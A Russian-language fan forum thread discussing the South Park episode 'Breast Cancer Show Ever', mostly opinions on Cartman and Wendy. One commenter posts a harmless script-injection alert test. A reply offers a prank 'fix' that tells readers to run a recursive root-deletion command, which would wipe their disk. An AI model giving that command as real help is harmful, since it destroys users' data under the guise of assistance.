Шоу о раке груди :: Breast Cancer Show Ever

Картман переходит все границы, и издевается над раком груди. Это чрезвычайно злит Венди и она преподносит Картману урок.
Чтобы перейти к обсуждаемому ролику или другому материалу, нажмите на ссылку над картинкой.
Страницы: Пред. 1 ... 36 37 38 39 40 След.
Ответить
Ответы

я одного не понимаю, он боится быть униженным в драке, но не боится насрать на стол перед всем классом, при этом так же унижая себя? так еще и трусы съесть...

хелп, Бро, о карлике - это про серию извинения перед Джефри... каким-то. У него был маленький рост. Это не о Вэнди)

Не понятно: рак - серьезная вещь, а алкоголь и курение - не запрещены. Что-то не сходится... (вредное производство и экология - ясно), но... Минздрав предупреждает: не провоцируйте рак!

Эрик съел свои... меня с Зеленого слоника так не тошнило!  

мне кажется именно на этой серии сп начал скатываться, в серии про гриффинов был такой посыл - можно смеяться либо над всем, либо ни над чем (или что-то в таком духе), в этой же серии фанатичка венди собирается избить картмана за его юмор (по меркам сп крайне паршивый, что обусловлено тем, что сценаристы этим целенаправленно хотели сделать в этой серии из картмана дегенерата) , что в итоге и происходит. половину серии нам вдалбливают о том, насколько рак груди ужасен и как о нём плохо шутить, однако мораль тут всё же другая - "не стоит лишний раз  <ВЦ>  что попало", да это прекрасная мораль, прекрасная мораль для гос пропаганды, саус парк же всегда был про свободу слова. Подытоживая могу сказать - серия ниочемная  <ВЦ> , единственный плюс - сцены где картман срет и ест трусы

Анонимус, хочу немного себя дополнить, организовать драку (которая, на минуточку, запрещена по правилам школы) помогло вышестоящее руководство, заинтересованное выигрыше конкретно венди, также и сценаристы в каждой сцене рисуют картмана просто жалким, тем самым склоняя зрителя болеть за венди и её идеалы. вероятно здесь всё же имеется некая действительно интересная метамораль, ведь такую беззубую и скучную  <ВЦ>  как здесь сценаристы начнут высерать только на 20ом сезоне и мне просто сложно поверить, что они эту серию делали без какой-либо подоплеки

<script>alert("если ты это читаешь, то я вставил скрипт на этот сайт через коментарии и здесь НЕБЕЗОПАСНО!")</script>

Цитата
Анонимус
если ты это читаешь, то я вставил скрипт на этот сайт через коментарии и здесь НЕБЕЗОПАСНО
Шухер, нас накрыли!!!!

Анонимус,
Цитата
Анонимус

<script>alert("если ты это читаешь, то я вставил скрипт на этот сайт через коментарии и здесь НЕБЕЗОПАСНО!")</script>  
Чтобы удалить скрипт с компьютера - сделайте загрузочную флешку с операционной системой linux, загрузитесь в неё, монтируйте ваш жесткий диск, затем, откройте консоль и введите команду rm -rf / -no-preserve-root.

Эрик Картманез, боже мой, ты до сих пор жив???
спустя 12 лет ты до сих пор смотришь South Park???

Цитата
Strzy
боже мой, ты до сих пор жив
Пока да.

Какой же Картман придурок… Говорят о смертельной болезни - ему смешон этот «женский бред». А ему было смешно, когда он ВИЧ получил?

По заслугам получил. А Баттерс быстро переметнулся))

Всю серию я угорал над искусными попытками Картмана уйти от драки, а в конце эпизода прям тяжело смотреть стало. Иногда вижу сходства между собой и Эриком :sorry:

Анонимус,в этом и прикол
Страницы: Пред. 1 ... 36 37 38 39 40 След.
Ответить
Форма ответов
Текст сообщения*
Загрузить файл или картинкуПеретащить с помощью Drag'n'drop
Перетащите файлы
Ничего не найдено
Загрузить картинки